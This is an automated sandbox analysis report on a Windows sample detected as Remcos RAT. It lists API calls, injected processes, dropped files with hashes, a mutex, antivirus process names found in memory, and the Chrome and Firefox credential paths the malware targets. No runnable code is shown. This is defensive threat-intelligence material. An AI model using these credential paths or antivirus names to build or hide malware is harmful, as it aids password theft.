Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	8_2_0280896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_02811FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_02811D58
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_02812393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_028120B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_0281201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_02812143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_02812690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_02808484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_028124BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_028125C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	11_2_027CF90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_0280896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_02811FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_02811D58
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_029A5ACC
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_029A5BD7
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: GetLocaleInfoA,	12_2_029AA810
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	13_2_02852393
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_028520B6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_0285201B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_02852143
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_02852690
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_02848484
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_028524BC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	13_2_028525C3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	13_2_0280F90C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	13_2_0284896D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	13_2_02851FD0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	13_2_02851D58

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029C920C GetLocalTime,

0_2_029C920C

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DB69E GetComputerNameExW,GetUserNameW,

8_2_027DB69E

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_02809210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_02809210

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029CB78C GetVersionExA,

0_2_029CB78C

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	8_2_027CBA4D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	11_2_027CBA4D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	13_2_0280BA4D

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	11_2_027CBB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \key3.db	13_2_0280BB6B

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6	Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe	8_2_027C569A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe	11_2_027C569A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: cmd.exe	13_2_0280569A

Windows Analysis Report
D2pQ4J4GGZ.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1562869
Product:	CloudBasic
Start time:	08:21:53
Start date:	26.11.2024
Sample:	D2pQ4J4GGZ.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	90c7bc4ce2d0f6eaadba08fac331f7b6
SHA1:	829acf583effec830edaed12ba8cda9c4bc1480f
SHA256:	0fca7f1081827c47d84ef12e4032db44a052539bd54c56394c610a672998f357
Filetype:	Win32 Executable (generic) a (10002005/4) 99.81%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\Libraries\PNO	ASCII text, with CRLF line terminators	6AF93A2133CA74514FEE8E205000807D	0DD52E57E1F8C74A43B66D3864D3DA34A56850EA	2218C54AC6A0D40E422F1E643C5DF24BCBBE62F33FFE335CA2501DC36629C402
C:\Users\Public\Libraries\Vjrsafyh	data	07C014E464B9479A8698195E22000F54	1BBD88FA63C24450DDAEEDA4F8AFDAC1E2215F01	32FEC5E83CEBF3FE721DF19E4A4FC1C36589640C9CA44DD683E10256ACFCA509
C:\Users\Public\Libraries\Vjrsafyh.PIF	PE32 executable (GUI) Intel 80386, for MS Windows	90C7BC4CE2D0F6EAADBA08FAC331F7B6	829ACF583EFFEC830EDAED12BA8CDA9C4BC1480F	0FCA7F1081827C47D84EF12E4032DB44A052539BD54C56394C610A672998F357
C:\Users\Public\Libraries\hyfasrjV.cmd	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators	B87F096CBC25570329E2BB59FEE57580	D281D1BF37B4FB46F90973AFC65EECE3908532B2	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
C:\Users\Public\Vjrsafyh.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Vjrsafyh.PIF">), ASCII text, with CRLF line terminators	FF290FA146FB5263380D1288A314C012	F55CB21BC2DD432A25D391F695DE9E219C9C335F	00ECEDDB7F19F875F0CD933556A5929D89B135ABE357FA5C032F1529F8BA5FA4
C:\Users\Public\alpha.pif	PE32 executable (console) Intel 80386, for MS Windows	D0FCE3AFA6AA1D58CE9FA336CC2B675B	4048488DE6BA4BFEF9EDF103755519F1F762668F	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
C:\Users\Public\xpha.pif	PE32 executable (console) Intel 80386, for MS Windows	B3624DD758CCECF93A1226CEF252CA12	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	22B25EAEFB08A8F5702460873EF7D1CC	125928FBD111254BF4061DFA71441F7C1C2E94B4	70A91BB4898FC456E97A6ECBD2ECD604C138A553A312B00F946735785F6FC8B8
\Device\Null	ASCII text, with CRLF, CR line terminators	19171115E3ABA564083635A13C1B6AD9	5AE256170731551E0BE5C4B65A195DA524CB3BF6	7714EE431C356DC1BCBD5328E5B052F50FA32CB4FEB5BD9A4D73F06882661584

Windows Analysis Report D2pQ4J4GGZ.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
D2pQ4J4GGZ.exe

Malware Threat Intel
Provided by